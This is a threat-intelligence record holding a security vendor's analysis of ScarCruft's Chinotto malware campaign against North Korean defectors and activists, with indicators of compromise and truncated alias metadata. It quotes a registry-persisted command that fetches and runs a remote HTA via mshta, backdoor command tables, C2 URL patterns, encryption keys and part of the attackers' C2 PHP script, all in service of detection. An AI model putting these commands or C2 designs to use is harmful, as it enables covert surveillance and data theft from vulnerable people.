{
	"id": "4865c75a-e8f7-4d73-8f51-f6286d9d2682",
	"created_at": "2026-04-06T00:11:40.542326Z",
	"updated_at": "2026-04-10T03:38:06.639784Z",
	"deleted_at": null,
	"sha1_hash": "fa9c020074f0dafaa088c04e67d4bd164b598db7",
	"title": "ScarCruft surveilling North Korean defectors and human rights activists",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3448888,
	"plain_text": "ScarCruft surveilling North Korean defectors and human rights activists\r\nBy GReAT\r\nPublished: 2021-11-29 · Archived: 2026-04-02 11:26:48 UTC\r\nThe ScarCruft group (also known as APT37 or Temp.Reaper) is a nation-state sponsored APT actor we first reported in\r\n2016. ScarCruft is known to target North Korean defectors, journalists who cover North Korea-related news and government\r\norganizations related to the Korean Peninsula, among others. Recently, we were approached by a news organization with a\r\nrequest for technical assistance during their cybersecurity investigations. As a result, we had an opportunity to perform a\r\ndeeper investigation on a host compromised by ScarCruft. The victim was infected by PowerShell malware and we\r\ndiscovered evidence that the actor had already stolen data from the victim and had been surveilling this victim for several\r\nmonths. The actor also attempted to send spear-phishing emails to the victim’s associates working in businesses related to\r\nNorth Korea by using stolen login credentials.\r\nBased on the findings from the compromised machine, we discovered additional malware. The actor utilized three types of\r\nmalware with similar functionalities: versions implemented in PowerShell, Windows executables and Android applications.\r\nAlthough intended for different platforms, they share a similar command and control scheme based on HTTP\r\ncommunication. Therefore, the malware operators can control the whole malware family through one set of command and\r\ncontrol scripts.\r\nWe were working closely with a local CERT to investigate the attacker’s command and control infrastructure and as a result\r\nof this, we were able to better understand how it works. The APT operator controls the malware using a PHP script on the\r\ncompromised web server and controls the implants based on the HTTP parameters. We were also able to acquire several log\r\nfiles from the compromised servers. 
Based on said files, we identified additional victims in South Korea and compromised\r\nweb servers that have been utilized by ScarCruft since early 2021. Additionally, we discovered older variants of the\r\nmalware, delivered via HWP documents, dating back to mid-2020.\r\nMore information about ScarCruft is available to customers of Kaspersky Intelligence Reporting. Contact:\r\nintelreports@kaspersky.com\r\nSpear-phishing document\r\nBefore spear-phishing a potential victim and sending a malicious document, the actor contacted an acquaintance of the\r\nvictim using the victim’s stolen Facebook account. The actor already knew that the potential target ran a business related to\r\nNorth Korea and asked about its current status. After a conversation on social media, the actor sent a spear-phishing email to\r\nthe potential victim using a stolen email account. The actor leveraged their attacks using stolen login credentials, such as\r\nFacebook and personal email accounts, and thereby showed a high level of sophistication.\r\nAfter a Facebook conversation, the potential target received a spear-phishing email from the actor. It contains a password-protected RAR archive with the password shown in the email body. The RAR file contains a malicious Word document.\r\nSpear-phishing email and decoy\r\nThis document contains a lure related to North Korea.\r\nMD5: baa9b34f152076ecc4e01e35ecc2de18\r\nFile name: 북한의 최근 정세와 우리의 안보.doc (North Korea’s latest situation and our national security)\r\nModified time: 2021-09-03 09:34:00\r\nAuthor: Leopard\r\nLast saved user: Cloud\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 1 of 12\n\nThis document contains a malicious macro and a payload for a multi-stage infection process. 
The first stage’s macro\r\ncontains obfuscated strings and then spawns another macro as a second stage.\r\nThe first stage macro checks for the presence of a Kaspersky security solution on the victim’s machine by trying the\r\nfollowing file paths:\r\nC:\\Windows\\avp.exe # Kaspersky AV\r\nC:\\Windows\\Kavsvc.exe # Kaspersky AV\r\nC:\\Windows\\clisve.exe # Unknown\r\nIf a Kaspersky security solution is indeed installed on the system, it enables trust access for Visual Basic Application (VBA)\r\nby setting the following registry key to ‘1’:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\[Application.Version]\\Word\\Security\\AccessVBOM\r\nBy doing so, Microsoft Office will trust all macros and run any code without showing a security warning or requiring the\r\nuser’s permission. Next, the macro creates a mutex named ‘sensiblemtv16n’ and opens the malicious file once more. Thanks\r\nto the “trust all macros” setting, the macro will be executed automatically.\r\nIf no Kaspersky security software is installed, the macro directly proceeds to decrypt the next stage’s payload. In order to\r\nachieve this, it uses a variation of a substitution method. For each character of the encrypted string, the script looks up the\r\ncharacter’s index in a second string and then takes the character at that index from the first string as the decrypted character.\r\nFirst string: BU+13r7JX9A)dwxvD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V\u0026tC,uYz=Z0RS8aM4Fqn\r\nSecond string: v\u0026tC,uYz=Z0RS8aM4FqnD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V7JX9A)dwxBU+13r\r\nThe decrypted second stage Visual Basic Application (VBA) contains shellcode as a hex string. This script is responsible for\r\ninjecting the shellcode into the process notepad.exe.\r\nShellcode in the second stage VBA\r\nThe shellcode contains the URL to fetch the next stage payload. After fetching the payload, the shellcode decrypts it with\r\ntrivial single-byte XOR decryption. 
Unfortunately, we weren’t able to gather the final payload when we investigated this\r\nsample.\r\nThe payload’s download path is:\r\nhxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalVyZDlodU1wUWNjTGt4bXhBV0pjQU1ja2M_ZT1mUnc4\r\nHost investigation\r\nAs a result of our efforts in helping the victim with the analysis, we had a chance to investigate the host of the owner who\r\nsent the spear-phishing email. When we first checked the process list, there was a suspicious PowerShell process running\r\nwith a rather suspicious parameter.\r\nThis PowerShell command was registered via the Run registry key as a mechanism for persistence:\r\nRegistry path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run – ONEGO\r\nc:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n\r\n1 -w 300000 2.2.2.2 || mshta hxxp://[redacted].cafe24[.]com/bbs/probook/1.html\r\nThis registry key causes the HTML Application (HTA) file to get fetched and executed by the mshta.exe process every time\r\nthe system is booted. The fetched ‘1.html’ is an HTML Application (.hta) file that contains Visual Basic Script (VBS), which\r\neventually executes PowerShell commands.\r\nThe PowerShell script offers simple backdoor functionalities and continuously queries the C2 server with HTTP POST\r\nrequests containing several parameters. 
At first, it sends a beacon to the C2 server with the host name:\r\nhxxp://[redacted].cafe24[.]com/bbs/probook/do.php?type=hello\u0026direction=send\u0026id=[host name]\r\nNext, it attempts to download commands from the C2 server with the following format:\r\nhxxp://[redacted].cafe24[.]com/bbs/probook/do.php??type=command\u0026direction=receive\u0026id=\r\nIf the HTTP response from the C2 server is 200, it checks the response data and executes the delivered commands.\r\nDelivered data: Description\r\nref: Send a beacon to the C2 server. HTTP request: ?type=hello\u0026direction=send\u0026id=\r\ncmd: If the command data includes ‘start’, execute the given command with cmd.exe and send base64 encoded ‘OK’ with the following POST format. Otherwise, it executes the given command, redirecting the result to the result file (%APPDATA%\\desktop.dat), and sends the contents of the file after base64 encoding. HTTP request: ?type=result\u0026direction=send\u0026id=\r\nWe discovered additional malware, tools and stolen files from the victim’s host. Due to limited access to the compromised\r\nhost, we were unable to figure out the initial infection vector. However, we assess this host was compromised on March 22,\r\n2021, based on the timestamp of the suspicious files. One characteristic of the malware we discovered from the victim is the\r\nwriting of execution results from commands to the file “%appdata%\\desktop.dat”. According to the Master File Table\r\n(MFT) information, this file was created the same day, March 22, 2021, and the last modification time is on September 8,\r\n2021, which means this file was used until just before our investigation.\r\nUsing the additional tools, the malware operator collected sensitive information from this victim, although we can’t assess\r\nexactly how much data was exfiltrated and what kind of data was stolen. 
Based on the timestamp of the folders and files\r\ncreated by the malware, the actor collected and exfiltrated files as early as August 2021. The log files with the .dat extension\r\nare encrypted, but can be decrypted with the one-byte XOR key 0x75. These log files contain the uploading history. We\r\nfound two log files and each of them contains slightly different logs. The ‘B14yNKWdROad6DDeFxkxPZpsUmb.dat’ file\r\ncontains zipping and uploading of the folder bearing the same name. The log file presents the process as: “Zip Dir Start \u003e\r\nUp Init \u003e Up Start \u003e Up File Succeed \u003e Zip Dir Succeed”. According to the log file, the malware operator collected\r\nsomething from the infected system in this folder and uploaded it after archiving.\r\nFile archiving and uploading log\r\nThe other log file, named “s5gRAEs70xTHkAdUjl_DY1fD.dat”, also contains a file uploading history, except for file\r\nzipping messages. It processes each file with this procedure: “Up Init \u003e Up Start \u003e Up File Succeed”.\r\nFile uploading log\r\nBased on what we found from this victim, we can confirm that the malware operator collected screenshots and exfiltrated\r\nthem between August 6, 2021 and September 8, 2021. Based on what we found out from the victim, we can summarize the\r\nwhole infection timeline. We suspect this host was compromised on March 22, 2021. After the initial infection, the actor\r\nattempted to implant additional malware, but an error occurred that led to the crash of the malware. 
The malware operator\r\nlater delivered the Chinotto malware in August 2021 and probably started to exfiltrate sensitive data from the victim.\r\nTimeline of the attack on the victim\r\nWindows executable Chinotto\r\nAs a result of the host investigation, we discovered a malicious Windows executable and found additional malware variants\r\nfrom VirusTotal and our own sample collection. One of the Windows executables contains a build path and the malware\r\nauthor appears to call the malware “Chinotto”.\r\nPDB path\r\nThe technical specifications in this analysis are based on the Chinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1)\r\nwe discovered from the host investigation. One of the characteristics of this malware is that it contains a lot of garbage code\r\nto impede analysis. During runtime, the malware copies unused data to the allocated buffer before copying the real value; or\r\nallocates an unused buffer, filling it with meaningless data, and never uses it.\r\nIt also restores functional strings such as C2 addresses and debugging messages to the stack at runtime. The malware creates\r\na mutex and fetches the C2 addresses, which are different for each sample we discovered:\r\nMutex: NxaNnkHnJiNAuDCcoCKRAngjHVUZG2hSZL03pw8Y\r\nC2 address: hxxp://luminix.openhaja[.]com/bbs/data/proc1/proc.php\r\nIn order to generate the identification value of the victim, the malware acquires both computer and user name and combines\r\nthem in the format ‘%computer name%_%user name%’. Next, it encrypts the acquired string with the XOR key\r\n‘YFXAWSAEAXee12D4’ and encodes it with base64.\r\nThe backdoor continuously queries the C2 server, awaiting commands from the malware operator. 
We observed an early\r\nversion of Chinotto malware (MD5 55afe67b0cd4a01f3a9a6621c26b1a49) which, while it also follows this simple principle,\r\nuses a hard-coded backdoor command ‘scap’. This means this specific sample is only designed for exfiltrating the victim’s\r\nscreenshot.\r\nThe Chinotto malware shows fully fledged capabilities to control and exfiltrate sensitive information from the victims.\r\nCommand: Description\r\nref: Send beacon to the C2 server: http://[C2 URL]?ref=id=%s\u0026type=hello\u0026direction=send\r\ncmd: Execute Windows commands and save the result to the %APPDATA%\\s5gRAEs70xTHkAdUjl_DY1f.dat file after encrypting with one-byte XOR key\r\ndown: Download file from the remote server\r\nup: Upload file\r\nstate: Upload log file (s5gRAEs70xTHkAdUjl_DY1fD.dat)\r\nregstart: Copy current malware to the CSIDL_COMMON_DOCUMENTS folder and execute command to register file to run registry: “reg add HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v a2McCq /t REG_SZ /d %s /f”\r\ncleartemp: Remove files from folder “%APPDATA%\\s5gRAEs70xTHkAdUjl_DY1fD”\r\nupdir: Archive directory and upload it. Archive is XOR encoded using the same key used when creating the identification value: ‘YFXAWSAEAXee12D4’\r\ninit: Collect files with the following extensions from the paths CSIDL_DESKTOP, CSIDL_PERSONAL (CSIDL_MYDOCUMENTS), CSIDL_MYMUSIC, CSIDL_MYVIDEO and upload them to the C2 server: jpg|jpeg|png|gif|bmp|hwp|doc|docx|xls|xlsx|xlsm|ppt|pptx|pdf|txt|mp3|amr|m4a|ogg|aac|wav|wma|3gpp|eml|lnk|zip|rar|egg|alz|7z|vcf|3\r\nscap: Take a screenshot, save it to the folder “%appdata%\\s5gRAEs70xTHkAdUjl_DY1fD” in an archived format. The file to store the screenshot has an ‘e_‘ prefix and 10 randomly generated characters as a filename. 
When uploading the screenshot file, it uses\r\n‘wrpdwRwsFEse’ as the filename.\r\nrun: Run Windows commands with ShellExecuteW API\r\nchdec: Download an encrypted file and decrypt it via CryptUnprotectData API\r\nupdate: Download updated malware and register it: reg add HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v m4cVWKDsa9WxAWr41iaNGR /t REG_SZ /d %s /f\r\nwait: Sleep for 30 minutes\r\nwakeup: Wake up after 2.5 seconds\r\nAnother malware sample (MD5 04ddb77e44ac13c78d6cb304d71e2b86) that demonstrated a slight difference during\r\nruntime was discovered from the same victim. This is the same fully featured backdoor, but it loads the backdoor command\r\nusing a different scheme. The malware checks for the existence of a ‘*.zbpiz’ file in the same folder. If it exists, it loads the\r\nfile’s content and uses it as a backdoor command after decrypting. The malware authors keep changing the capabilities of\r\nthe malware to evade detection and create custom variants depending on the victim’s scenario.\r\nIn addition, there are different Windows executable variants of the Chinotto malware. Apart from the conventional Chinotto\r\nmalware mentioned above, a different variant contains an embedded PowerShell script. The spawned PowerShell command\r\nhas similar functionality to the PowerShell we found from the victim. However, it contains additional backdoor commands,\r\nsuch as uploading and downloading capabilities. 
Based on the build timestamp of the malware, we assess that the malware\r\nauthor used the PowerShell embedded version from mid-2019 to mid-2020 and started to use the malicious, PowerShell-less\r\nWindows executable from the end of 2020 onward.\r\nAndroid Chinotto\r\nBased on the C2 communication pattern, we discovered an Android application version of Chinotto malware (MD5\r\n56f3d2bcf67cf9f7b7d16ce8a5f8140a). This malicious APK requests excessive permissions according to the\r\nAndroidManifest.xml file. To achieve its purpose of spying on the user, these apps ask users to enable various sorts of\r\npermissions. Granting these permissions allows the apps to collect sensitive information, including contacts, messages, call\r\nlogs, device information and audio recordings. Each sample has a different package name, with the analyzed sample bearing\r\n“com.secure.protect” as a package name.\r\nThe malware sends its unique device ID in the same format as the Windows executable version of Chinotto.\r\nBeacon URI pattern: [C2 url]?type=hello\u0026direction=send\u0026id=[Unique Device ID]\r\nNext, it receives a command after the following HTTP request:\r\nRetrieve commands: [C2 url]?type=command\u0026direction=receive\u0026id=[Unique Device ID]\r\nIf the delivered data from the C2 server is not “ERROR” or “Fail”, the malware starts to carry out backdoor operations.\r\nCommand (URI pattern): Description\r\nref (?type=hello\u0026direction=send\u0026id=): Send the same beacon request to the C2 server\r\ndown (?type=file\u0026direction=send\u0026id=): Upload the temporary file (/sdcard/.temp-file.dat) to the C2 server and remove it from local storage.\r\nUriP (?type=file\u0026direction=send\u0026id=): Save temporary file path to the result file (/sdcard/result-file.dat) and upload the temporary 
file.\r\nUploadInfo (?type=hello\u0026direction=send\u0026id= and ?type=file\u0026direction=send\u0026id=): After sending a beacon, collect the following information to the /icloud/tmp-web path:\r\nInfo.txt: Phone number, IP address, SDK version (OS version), Temporary file path\r\nSms.txt: Save all text messages with JSON format\r\nCalllog.txt: Save all call logs with JSON format\r\nContact.txt: Save all contact lists with JSON format\r\nAccount.txt: Save all account information with JSON format\r\nUpload collected file after archiving. The archived file is encrypted by AES with the key “3399CEFC3326EEFF”.\r\nUploadFile (?type=file\u0026direction=send\u0026id=): Execute command ‘cd /sdcard;ls -alR’, save the result to the temporary file (/sdcard/.temp-file.dat) and upload it. Upload all thumbnails and photos after encrypting via AES and the key “3399CEFC3326EEFF”.\r\nETC (?type=file\u0026direction=send\u0026id= and ?type=file\u0026direction=send\u0026id): Execute command saving the result to the result file (/sdcard/result-file.dat) and upload the result\r\nWe found that the actor had an interest in a more specific file list in one variant (MD5\r\ncba17c78b84d1e440722178a97886bb7). The ‘UploadFile’ command of this variant uploads specific files to the C2 server.\r\nThe AMR file is an audio file generally used for recording phone calls. Also, Huawei cloud and Tencent services are two of\r\nthe targets. To surveil the victim, the list includes target folders as well as /Camera, /Recordings, /KakaoTalk (a renowned\r\nKorean messenger), /문건(documents), /사진(pictures) and /좋은글(good articles).\r\nTargeted files and folders\r\nTo sum up, the actor targeted victims with a probable spear-phishing attack for Windows systems and smishing for Android\r\nsystems. 
The actor leverages Windows executable versions and PowerShell versions to control Windows systems. We may\r\npresume that if a victim’s host and mobile are infected at the same time, the malware operator is able to overcome two-factor\r\nauthentication by stealing SMS messages from the mobile phone. After a backdoor operation with a fully featured backdoor,\r\nthe operator is able to steal any information they are interested in. Using the stolen information, the actor further leverages\r\ntheir attacks. For example, the group attempts to infect additional valuable hosts and contact potential victims using stolen\r\nsocial media accounts or email accounts.\r\nAttack procedure\r\nOlder malicious HWP documents\r\nThe threat actor behind this campaign delivered the same malware with a malicious HWP file. At that time, lures related to\r\nCOVID-19 and credential access were used.\r\nHWP hash: f17502d3e12615b0fa8868472a4eabfb\r\nHWP file name: 코로나19 재감염 사례-백신 무용지물.hwp (Covid-19 reinfection case-Useless vaccine.hwp)\r\nDropped payload hash: 72e5b8ea33aeb083631d1e8b302e76af (Visual Basic Script)\r\nHWP hash: c155f49f0a9042d6df68fb593968e110\r\nHWP file name: 계정기능 제한 안내.hwp (Notice of limitation of account.hwp)\r\nDropped payload hash: 5a7ef48fe0e8ae65733db64ddb7f2478 (Windows executable)\r\nThe Visual Basic Script created by the first HWP file (MD5 f17502d3e12615b0fa8868472a4eabfb) has similar\r\nfunctionalities to the Chinotto malware. It also uses the same HTTP communication pattern. The second payload dropped\r\nfrom the malicious HWP is a Windows executable executing an embedded PowerShell script with the same functionalities.\r\nThese discoveries reveal related activity dating back to at least mid-2020.\r\nInfrastructure\r\nIn this campaign, the actor relied solely on compromised web servers, mostly located in South Korea. 
During this research\r\nwe worked closely with the local CERT to take down the attacker’s infrastructure and had a chance to look into one of the\r\nscripts on the C2 servers that control the Chinotto malware. The C2 script (named “do.php”) uses several predefined files to\r\nsave the client’s status (shakest) and commands (comcmd). Also, it parses several parameters (id, type, direction, data)\r\ndelivered by the HTTP request from the implant:\r\n$type = \"\";             # 'type' parameter\r\n$shakename = \"shakest\"; # Save client status\r\n$comcmdname = \"comcmd\"; # Save commands\r\n$btid = \"\";             # Client unique ID\r\n$direction = \"\";        # 'direction' parameter\r\n$data = \"\";             # 'data' parameter\r\nif (isset($_GET['id'])){\r\n    $btid = $_GET['id'];\r\n}\r\nif (isset($_GET['type'])){\r\n    $type = $_GET['type'];\r\n}\r\nif (isset($_GET['direction'])){\r\n    $direction = $_GET['direction'];\r\n}\r\nif (isset($_GET['data'])){\r\n    $data = $_GET['data'];\r\n}\r\n..\r\n$comname = $btid.\"\";\r\n$comresname = $comname . \"-result\";\r\nIn order to control the client, the C2 script uses HTTP parameters. First, it checks the value of the ‘type’ parameter. The\r\n‘type’ parameter carries four values: hello, command, result, and file.\r\nValue of ‘type’ param: Description\r\nhello: Report and control the client status\r\ncommand: Hold the command from the operator or retrieve the command from the client\r\nresult: Upload the command execution result or retrieve the command\r\nfile: Upload file to the C2 server\r\n‘hello’ type\r\nWhen the script receives the ‘type=hello’ parameter, it checks the value of ‘direction’. 
In this routine, the script checks the\r\nstatus of the client. The malware operator saves the client status to a specific file, the ‘shakest’ file in this case. If the ‘send’\r\nvalue is being received, the client status is set to ‘ON’. If ‘receive’ is set as well, the client’s status log file is sent (likely in\r\norder to send the status of clients to the malware operator). The ‘refresh’ value is for setting all clients to ‘OFF’ and ‘release’\r\nis used to initialize the command file. The client just replies ‘OK’.\r\n‘type=hello’ commands\r\n‘command’ type\r\nIn order to manage the implant’s commands, the C2 script handles several additional parameters. If the ‘type=command’\r\nalongside ‘direction=receive’ is set, it issues a request from the client to retrieve a command.\r\nThere are two kinds of command files: common commands like an initial command or commands sent to all clients, and\r\nindividual commands for a specific client. If an individual command exists for a client, it delivers it. Otherwise, the client is\r\nsent a common command. If the ‘direction’ parameter is set to ‘send’, the request is coming from the malware operator in\r\norder to save the sent command in the C2 server. Using this request, the operator can set two commands files: common\r\ncommand or individual command. If the ‘botid’ parameter contains ‘cli’, it means this request is for setting a common\r\ncommand file. If the ‘data’ parameter contains ‘refclear:’, the common command file gets initialized. Otherwise, the ‘data’\r\nvalue is saved to the common command file. If ‘botid’ is not ‘cli’, it means this request is directed to an individual command\r\nfile. 
The process of saving the individual command file is the same as the process used for saving the common command.\r\ntype=command commands\r\n‘result’ type\r\nWhen uploading command execution results coming from the implant, the script sets the ‘type’ parameter to ‘result’. If the\r\n‘direction’ parameter equals ‘send’, it saves the value of the ‘data’ parameter to the individual result file: “[botid]-result“.\r\nThe ‘receive’ value of the ‘direction’ parameter means retrieving the individual result file. The script then sends the result\r\nfile to the operator after encoding it with base64.\r\n‘file’ type\r\nThe last possible ‘type’ command is ‘file’. This value is used for exfiltrating files from the victim. If a file upload succeeds,\r\nthe script sends the message ‘SEND SUCCESS’. Otherwise, it sends ‘There was an error uploading the file, please try\r\nagain!’.\r\nWe discovered that the malware operator used a separate webpage to monitor and control the victims. From several\r\ncompromised C2 servers we see a control page carrying a ‘control.php’ file name.\r\nControl page from this case\r\nThe control page shows a simple structure. The operator can see a list of infected hosts in the left panel with the\r\ncorresponding status “ON” or “OFF”. Based on this information, the operator is able to issue a command using the right\r\npanel and watch the result from the client.\r\nVictims\r\nWe began this research by providing support to human rights activists and defectors from North Korea against an actor\r\nseeking to surveil and track them.\r\nAdditionally, we discovered further victims we couldn’t profile from analyzing the C2 servers. From analyzing the attacker’s\r\ninfrastructure, we found 75 client connections between January 2021 and February 2021. 
Most IP addresses seem to be Tor\r\nor VPN connections, which are likely to be either from researchers or the malware operators.\r\nAnalyzing other C2 servers, we found more information about possible additional victims. Excluding connections coming\r\nfrom Tor, there are only connections coming from South Korea. Based on the IP addresses, we could distinguish four\r\ndifferent suspected victims located in South Korea, and determine their operating system and browser used based on user-agent information:\r\nVictim A connected to the C2 server from July 16 to September 5 and has outdated versions of Windows OS and Internet\r\nExplorer. Victim B connected to this server on September 4 and operates Windows 8 and Internet Explorer 10. While we\r\nwere investigating the C2 server, Victim D kept connecting to it, using Windows 10 with Chrome version 78.\r\nTimeline of victims\r\nTo sum up, this campaign is targeting entities in South Korea, which is a top point of interest for ScarCruft. Based on our\r\nfindings, we also assume that the threat actor targeted individuals rather than specific companies or organizations.\r\nAttribution\r\nWe discovered several code overlaps with old ScarCruft malware named POORWEB. At first, when Chinotto malware\r\nuploads the file to the C2 server, it uses the HTTP POST request with a boundary generated with a random function. When\r\nChinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1) generates a boundary value, it executes the random()\r\nfunction twice and concatenates each value. 
The generation process is not exactly the same, but it utilizes a similar scheme\r\nas the old POORWEB malware (MD5 97b35c34d600088e2a281c3874035f59).\r\nHTTP boundary generation routine\r\nMoreover, there is additional code overlap with Document Stealer malware (MD5 cff9d2f8dae891bd5549bde869fe8b7a)\r\nthat was previously utilized with POORWEB malware. When the Chinotto malware checks the response from the C2 server,\r\nit checks whether the response is ‘HTTP/1.1 200 OK’ and not ‘error’. This Document Stealer malware also has the same\r\nroutine to check responses from the C2 server.\r\nC2 response check routine\r\nApart from code similarity, historically, ScarCruft group is known to surveil individuals related to North Korea such as\r\njournalists, defectors, diplomats and government employees. The target of this attack is within the same scope as previous\r\nScarCruft group campaigns. Based on the victimology and several code overlaps, we assess with medium confidence that\r\nthis cyber-espionage operation is related to the ScarCruft group.\r\nConclusions\r\nMany journalists, defectors and human rights activists are targets of sophisticated cyberattacks. Unlike corporations, these\r\ntargets typically don’t have sufficient tools to protect against and respond to highly skilled surveillance attacks. One of the\r\npurposes of our team is to help individuals targeted by APT groups. This research stemmed from this kind of endeavor. Our\r\ncollaboration with the local CERT allowed us to gain a unique look into ScarCruft’s infrastructure setup and allowed us to\r\ndiscover many technical details.\r\nUsing these findings, we found additional Android variants of the same malware, which has been invaluable in\r\nunderstanding and tracking ScarCruft TTPs. 
Moreover, while hunting for related activity, we uncovered an older set of\r\nactivity dating back to mid-2020, possibly indicating that ScarCruft operations against this set of individuals have been\r\noperating for a longer period of time.\r\nIndicators of compromise\r\nMalicious documents\r\nHTA file\r\nWindows executable Chinotto\r\nPowerShell embedded Chinotto\r\nc7c3b03108f2386022793ed29e621343\r\n5a7ef48fe0e8ae65733db64ddb7f2478\r\nb06c203db2bad2363caed1c0c11951ae\r\nf08d7f7593b1456a087eb9922507c743\r\n0dd115c565615651236fffaaf736e377\r\nd8ad81bafd18658c52564bbdc89a7db2\r\nAndroid application Chinotto\r\n71b63d2c839c765f1f110dc898e79d67\r\nc9fb6f127ca18a3c2cf94e405df67f51\r\n3490053ea54dfc0af2e419be96462b08\r\ncba17c78b84d1e440722178a97886bb7\r\n56f3d2bcf67cf9f7b7d16ce8a5f8140a\r\nPayload hosting URLs\r\nhxxps://api[.]onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalVyZDlodU1wUWNjTGt4bXhBV0pjQU1ja2M_ZT1mUnc4VH\r\nhxxp://www[.]djsm.co[.]kr/js/20170805[.]hwp\r\nCommand and control server\r\nhxxp://luminix[.]openhaja[.]com/bbs/data/proc1/proc[.]php\r\nhxxp://luminix[.]kr/bbs/data/proc/proc[.]php\r\nhxxp://kjdnc[.]gp114[.]net/data/log/do[.]php\r\nhxxp://kumdo[.]org/admin/cont/do[.]php\r\nhxxp://haeundaejugong[.]com/editor/chinotto/do[.]php\r\nhxxp://haeundaejugong[.]com/data/jugong/do[.]php\r\nhxxp://doseoul[.]com/bbs/data/hnc/update[.]php\r\nhxxp://hz11[.]cn/jquery-ui-1[.]10[.]4/tests/unit/widget/doc/pu[.]php\r\nMITRE ATT\u0026CK mapping\r\nTactic Technique Technique Name\r\nResource Development T1584.006 Compromise Infrastructure: Web Services\r\nInitial Access T1566.001 Phishing: Spear-phishing Attachment\r\nExecution T1059.001 Command and Scripting Interpreter: PowerShell\r\nExecution T1059.005 Command and Scripting Interpreter: Visual Basic\r\nPersistence T1547.001 Boot or Logon Autostart Execution: Registry Run 
Keys/Startup Folder\r\nDefense Evasion\r\nT1140\r\nT1036.005\r\nDeobfuscate/Decode Files or Information\r\nMasquerading: Match Legitimate Name or Location\r\nDiscovery\r\nT1033\r\nT1082\r\nSystem Owner/User Discovery\r\nSystem Information Discovery\r\nCollection\r\nT1113\r\nT1560.002\r\nScreen Capture\r\nArchive Collected Data: Archive via Library\r\nCommand and Control\r\nT1071.001\r\nT1573.001\r\nApplication Layer Protocol: Web Protocols\r\nEncrypted Channel: Symmetric Cryptography\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nSource: https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/"
	],
	"report_names": [
		"105074"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
